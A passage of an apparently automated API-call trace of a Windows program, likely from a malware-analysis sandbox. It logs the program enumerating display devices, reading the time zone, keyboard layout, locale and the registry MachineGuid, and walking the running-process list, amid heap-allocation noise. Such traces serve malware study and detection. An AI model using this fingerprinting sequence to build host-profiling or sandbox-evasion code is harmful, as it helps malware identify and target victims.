(in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c79e0 | out: hHeap=0x2b0000) returned 1 [0221.131] EnumDisplayDevicesW (in: lpDevice=0x0, iDevNum=0x1, lpDisplayDevice=0x27ef40, dwFlags=0x1 | out: lpDisplayDevice=0x27ef40) returned 1 [0221.136] GetProcessHeap () returned 0x2b0000 [0221.136] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x22) returned 0x2dc5a8 [0221.136] GetProcessHeap () returned 0x2b0000 [0221.136] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f08f0 [0221.136] GetProcessHeap () returned 0x2b0000 [0221.137] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08f0, Size=0x10) returned 0x2f52e0 [0221.137] GetProcessHeap () returned 0x2b0000 [0221.137] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x10) returned 0x2f51d8 [0221.137] GetProcessHeap () returned 0x2b0000 [0221.137] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecb08 | out: hHeap=0x2b0000) returned 1 [0221.137] GetProcessHeap () returned 0x2b0000 [0221.137] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f52e0 | out: hHeap=0x2b0000) returned 1 [0221.137] GetProcessHeap () returned 0x2b0000 [0221.137] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2dc5a8 | out: hHeap=0x2b0000) returned 1 [0221.137] EnumDisplayDevicesW (in: lpDevice=0x0, iDevNum=0x2, lpDisplayDevice=0x27ef40, dwFlags=0x1 | out: lpDisplayDevice=0x27ef40) returned 1 [0221.137] GetProcessHeap () returned 0x2b0000 [0221.137] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x34) returned 0x2eb4a8 [0221.138] GetProcessHeap () returned 0x2b0000 [0221.138] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xc) returned 0x2f52e0 [0221.138] GetProcessHeap () returned 0x2b0000 [0221.138] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x18) returned 0x2ceff0 [0221.138] GetProcessHeap () returned 0x2b0000 [0221.138] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ceff0, Size=0x30) returned 0x2ec3b8 [0221.138] GetProcessHeap () returned 0x2b0000 [0221.138] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x19) returned 0x2ecb08 [0221.138] GetProcessHeap () returned 0x2b0000 [0221.138] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f51d8 | out: hHeap=0x2b0000) returned 1 [0221.138] GetProcessHeap () returned 0x2b0000 [0221.138] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ec3b8 | out: hHeap=0x2b0000) returned 1 [0221.138] GetProcessHeap () returned 0x2b0000 [0221.138] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2eb4a8 | out: hHeap=0x2b0000) returned 1 [0221.138] EnumDisplayDevicesW (in: lpDevice=0x0, iDevNum=0x3, lpDisplayDevice=0x27ef40, dwFlags=0x1 | out: lpDisplayDevice=0x27ef40) returned 1 [0221.139] GetProcessHeap () returned 0x2b0000 [0221.139] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x3a) returned 0x2c79e0 [0221.139] GetProcessHeap () returned 0x2b0000 [0221.139] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xe) returned 0x2f51d8 [0221.139] GetProcessHeap () returned 0x2b0000 [0221.139] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f51d8, Size=0x1c) returned 0x2ecf68 [0221.139] GetProcessHeap () returned 0x2b0000 [0221.139] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x1c) returned 0x2ed080 [0221.139] GetProcessHeap () returned 0x2b0000 [0221.139] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecb08 | out: hHeap=0x2b0000) returned 1 [0221.139] GetProcessHeap () returned 0x2b0000 [0221.139] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.139] GetProcessHeap () returned 0x2b0000 [0221.139] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c79e0 | out: hHeap=0x2b0000) returned 1 [0221.139] EnumDisplayDevicesW (in: lpDevice=0x0, iDevNum=0x4, lpDisplayDevice=0x27ef40, dwFlags=0x1 | out: lpDisplayDevice=0x27ef40) returned 0 [0221.140] GetProcessHeap () returned 0x2b0000 [0221.140] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f08f0 [0221.140] GetProcessHeap () returned 0x2b0000 [0221.140] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f08f0, Size=0x20) returned 0x2ecf68 [0221.140] GetProcessHeap () returned 0x2b0000 [0221.140] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ecf68, Size=0x40) returned 0x2c79e0 [0221.140] GetProcessHeap () returned 0x2b0000 [0221.140] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c79e0 | out: hHeap=0x2b0000) returned 1 [0221.140] GetTimeZoneInformation (in: lpTimeZoneInformation=0x27eaa0 | out: lpTimeZoneInformation=0x27eaa0) returned 0x2 [0221.154] GetProcessHeap () returned 0x2b0000 [0221.154] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x2) returned 0x2f08f0 [0221.155] GetProcessHeap () returned 0x2b0000 [0221.155] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.155] GetProcessHeap () returned 0x2b0000 [0221.155] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.156] GetProcessHeap () returned 0x2b0000 [0221.156] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f52e0 | out: hHeap=0x2b0000) returned 1 [0221.156] GetProcessHeap () returned 0x2b0000 [0221.156] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x30) returned 0x2ec3b8 [0221.156] GetProcessHeap () returned 0x2b0000 [0221.156] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb) returned 0x2f52e0 [0221.156] GetProcessHeap () returned 0x2b0000 [0221.156] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x16) returned 0x2ceff0 [0221.156] GetProcessHeap () returned 0x2b0000 [0221.156] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ceff0, Size=0x2c) returned 0x2ec508 [0221.156] GetProcessHeap () returned 0x2b0000 [0221.156] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x17) returned 0x2ceff0 [0221.156] GetProcessHeap () returned 0x2b0000 [0221.157] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xa) returned 0x2f52e0 [0221.157] GetProcessHeap () returned 0x2b0000 [0221.157] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x21) returned 0x2dc5a8 [0221.157] GetProcessHeap () returned 0x2b0000 [0221.157] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc5a8, Size=0x42) returned 0x2c6680 [0221.157] GetProcessHeap () returned 0x2b0000 [0221.157] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ceff0 | out: hHeap=0x2b0000) returned 1 [0221.157] GetProcessHeap () returned 0x2b0000 [0221.157] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ec508 | out: hHeap=0x2b0000) returned 1 [0221.157] GetProcessHeap () returned 0x2b0000 [0221.157] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ec3b8 | out: hHeap=0x2b0000) returned 1 [0221.157] GetProcessHeap () returned 0x2b0000 [0221.158] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c6680 | out: hHeap=0x2b0000) returned 1 [0221.158] GetKeyboardLayoutList (in: nBuff=16, lpList=0x27e8a0 | out: lpList=0x27e8a0) returned 1 [0221.158] GetLocaleInfoW (in: Locale=0x409, LCType=0x2, lpLCData=0x27ecc0, cchData=255 | out: lpLCData="English (United States)") returned 24 [0221.162] GetProcessHeap () returned 0x2b0000 [0221.162] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x30) returned 0x2ec3b8 [0221.162] GetProcessHeap () returned 0x2b0000 [0221.162] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb) returned 0x2f52e0 [0221.162] GetProcessHeap () returned 0x2b0000 [0221.162] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x16) returned 0x2ceff0 [0221.162] GetProcessHeap () returned 0x2b0000 [0221.162] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ceff0, Size=0x2c) returned 0x2ec508 [0221.162] GetProcessHeap () returned 0x2b0000 [0221.162] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x17) returned 0x2ceff0 [0221.163] GetProcessHeap () returned 0x2b0000 [0221.163] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ec508 | out: hHeap=0x2b0000) returned 1 [0221.163] GetProcessHeap () returned 0x2b0000 [0221.163] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ec3b8 | out: hHeap=0x2b0000) returned 1 [0221.163] GetProcessHeap () returned 0x2b0000 [0221.164] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x17) returned 0x2cf110 [0221.164] GetProcessHeap () returned 0x2b0000 [0221.164] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cf110, Size=0x2e) returned 0x2ec3b8 [0221.164] GetProcessHeap () returned 0x2b0000 [0221.164] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ec3b8 | out: hHeap=0x2b0000) returned 1 [0221.164] GetProcessHeap () returned 0x2b0000 [0221.164] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ceff0 | out: hHeap=0x2b0000) returned 1 [0221.164] GetProcessHeap () returned 0x2b0000 [0221.164] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x12) returned 0x2ceff0 [0221.165] GetProcessHeap () returned 0x2b0000 [0221.165] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ceff0, Size=0x24) returned 0x2dc5a8 [0221.165] GetProcessHeap () returned 0x2b0000 [0221.165] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2dc5a8, Size=0x48) returned 0x2c6680 [0221.165] GetProcessHeap () returned 0x2b0000 [0221.165] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2c6680, Size=0x40) returned 0x2c79e0 [0221.165] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Cryptography", ulOptions=0x0, samDesired=0x101, phkResult=0x27e7ec | out: phkResult=0x27e7ec*=0x30c) returned 0x0 [0221.165] GetProcessHeap () returned 0x2b0000 [0221.165] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c79e0 | out: hHeap=0x2b0000) returned 1 [0221.165] GetProcessHeap () returned 0x2b0000 [0221.165] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.165] GetProcessHeap () returned 0x2b0000 [0221.165] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.165] GetProcessHeap () returned 0x2b0000 [0221.165] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.165] GetProcessHeap () returned 0x2b0000 [0221.165] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ecf68, Size=0x18) returned 0x2ceff0 [0221.165] RegQueryValueExW (in: hKey=0x30c, lpValueName="MachineGuid", lpReserved=0x0, lpType=0x0, lpData=0x27dfcc, lpcbData=0x27e7e8*=0x800 | out: lpType=0x0, lpData=0x27dfcc*=0x62, lpcbData=0x27e7e8*=0x4a) returned 0x0 [0221.165] GetProcessHeap () returned 0x2b0000 [0221.165] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ceff0 | out: hHeap=0x2b0000) returned 1 [0221.165] GetProcessHeap () returned 0x2b0000 [0221.165] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x12) returned 0x2ceff0 [0221.166] GetProcessHeap () returned 0x2b0000 [0221.166] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2ceff0, Size=0x24) returned 0x2dc5a8 [0221.166] RegCloseKey (hKey=0x30c) returned 0x0 [0221.166] GetProcessHeap () returned 0x2b0000 [0221.166] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.166] GetProcessHeap () returned 0x2b0000 [0221.166] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.166] GetProcessHeap () returned 0x2b0000 [0221.166] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x31) returned 0x2eb4a8 [0221.166] GetProcessHeap () returned 0x2b0000 [0221.166] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2eb4a8, Size=0x62) returned 0x2d60e0 [0221.167] GetProcessHeap () returned 0x2b0000 [0221.167] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2cd798, Size=0x2a0) returned 0x2fbfc8 [0221.167] GetProcessHeap () returned 0x2b0000 [0221.167] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d60e0 | out: hHeap=0x2b0000) returned 1 [0221.167] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x30c [0221.174] Process32First (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0221.176] strlen (_Str="[System Process]") returned 0x10 [0221.178] GetProcessHeap () returned 0x2b0000 [0221.178] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.178] GetProcessHeap () returned 0x2b0000 [0221.178] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.178] GetProcessHeap () returned 0x2b0000 [0221.178] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.179] GetProcessHeap () returned 0x2b0000 [0221.179] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.179] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x52, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0221.180] strlen (_Str="System") returned 0x6 [0221.180] GetProcessHeap () returned 0x2b0000 [0221.180] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.180] GetProcessHeap () returned 0x2b0000 [0221.180] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.180] GetProcessHeap () returned 0x2b0000 [0221.180] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f52e0 | out: hHeap=0x2b0000) returned 1 [0221.181] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0221.182] strlen (_Str="smss.exe") returned 0x8 [0221.182] GetProcessHeap () returned 0x2b0000 [0221.182] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.182] GetProcessHeap () returned 0x2b0000 [0221.182] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.182] GetProcessHeap () returned 0x2b0000 [0221.182] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f52e0 | out: hHeap=0x2b0000) returned 1 [0221.182] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x14c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.184] strlen (_Str="csrss.exe") returned 0x9 [0221.184] GetProcessHeap () returned 0x2b0000 [0221.184] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.184] GetProcessHeap () returned 0x2b0000 [0221.184] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.184] GetProcessHeap () returned 0x2b0000 [0221.184] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f52e0 | out: hHeap=0x2b0000) returned 1 [0221.184] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x144, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0221.186] strlen (_Str="wininit.exe") returned 0xb [0221.186] GetProcessHeap () returned 0x2b0000 [0221.186] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.186] GetProcessHeap () returned 0x2b0000 [0221.186] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.186] GetProcessHeap () returned 0x2b0000 [0221.186] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.186] GetProcessHeap () returned 0x2b0000 [0221.186] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.186] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0221.188] strlen (_Str="csrss.exe") returned 0x9 [0221.188] GetProcessHeap () returned 0x2b0000 [0221.188] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.188] GetProcessHeap () returned 0x2b0000 [0221.188] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.188] GetProcessHeap () returned 0x2b0000 [0221.188] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f52e0 | out: hHeap=0x2b0000) returned 1 [0221.188] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x168, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0221.189] strlen (_Str="winlogon.exe") returned 0xc [0221.190] GetProcessHeap () returned 0x2b0000 [0221.190] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.190] GetProcessHeap () returned 0x2b0000 [0221.190] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.190] GetProcessHeap () returned 0x2b0000 [0221.190] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.190] GetProcessHeap () returned 0x2b0000 [0221.190] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.190] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0221.192] strlen (_Str="services.exe") returned 0xc [0221.192] GetProcessHeap () returned 0x2b0000 [0221.192] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.192] GetProcessHeap () returned 0x2b0000 [0221.192] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.192] GetProcessHeap () returned 0x2b0000 [0221.192] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.192] GetProcessHeap () returned 0x2b0000 [0221.193] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.193] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0221.194] strlen (_Str="lsass.exe") returned 0x9 [0221.194] GetProcessHeap () returned 0x2b0000 [0221.194] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.194] GetProcessHeap () returned 0x2b0000 [0221.194] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.194] GetProcessHeap () returned 0x2b0000 [0221.194] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f52e0 | out: hHeap=0x2b0000) returned 1 [0221.194] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0221.196] strlen (_Str="lsm.exe") returned 0x7 [0221.196] GetProcessHeap () returned 0x2b0000 [0221.196] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.196] GetProcessHeap () returned 0x2b0000 [0221.196] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.197] GetProcessHeap () returned 0x2b0000 [0221.197] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f52e0 | out: hHeap=0x2b0000) returned 1 [0221.197] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.198] strlen (_Str="svchost.exe") returned 0xb [0221.198] GetProcessHeap () returned 0x2b0000 [0221.198] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.198] GetProcessHeap () returned 0x2b0000 [0221.198] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.198] GetProcessHeap () returned 0x2b0000 [0221.199] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.199] GetProcessHeap () returned 0x2b0000 [0221.199] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.199] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x28c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.200] strlen (_Str="svchost.exe") returned 0xb [0221.200] GetProcessHeap () returned 0x2b0000 [0221.200] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.200] GetProcessHeap () returned 0x2b0000 [0221.200] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.201] GetProcessHeap () returned 0x2b0000 [0221.201] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.201] GetProcessHeap () returned 0x2b0000 [0221.201] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.201] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.202] strlen (_Str="svchost.exe") returned 0xb [0221.202] GetProcessHeap () returned 0x2b0000 [0221.202] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.202] GetProcessHeap () returned 0x2b0000 [0221.202] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.203] GetProcessHeap () returned 0x2b0000 [0221.203] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.203] GetProcessHeap () returned 0x2b0000 [0221.203] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.203] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.204] strlen (_Str="svchost.exe") returned 0xb [0221.204] GetProcessHeap () returned 0x2b0000 [0221.204] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.205] GetProcessHeap () returned 0x2b0000 [0221.205] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f0890, Size=0x10) returned 0x2f52e0 [0221.205] GetProcessHeap () returned 0x2b0000 [0221.205] RtlReAllocateHeap (Heap=0x2b0000, Flags=0x0, Ptr=0x2f52e0, Size=0x20) returned 0x2ecf68 [0221.205] GetProcessHeap () returned 0x2b0000 [0221.205] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2ecf68 | out: hHeap=0x2b0000) returned 1 [0221.205] Process32Next (in: hSnapshot=0x30c, lppe=0x27eb50 | out: lppe=0x27eb50*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0221.206] strlen (_Str="svchost.exe") returned 0xb [0221.206] GetProcessHeap () returned 0x2b0000 [0221.207] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8) returned 0x2f0890 [0221.207] GetProcessHeap () returned 0x2b0000 [0221.207] RtlReAllocateHeap (Heap=0x2b0000, 